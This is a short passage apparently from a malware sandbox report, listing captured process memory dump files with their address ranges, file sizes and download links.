memory/3896-238-0x0000000000EF0000-0x0000000000EFF000-memory.dmp

Filesize
60KB

Download
memory/4068-248-0x0000000000000000-mapping.dmp

Download
memory/4068-254-0x0000000000D80000-0x0000000000D85000-memory.dmp

Filesize
20KB

Download
memory/4068-255-0x0000000000D70000-0x0000000000D79000-memory.dmp

Filesize
36KB

Download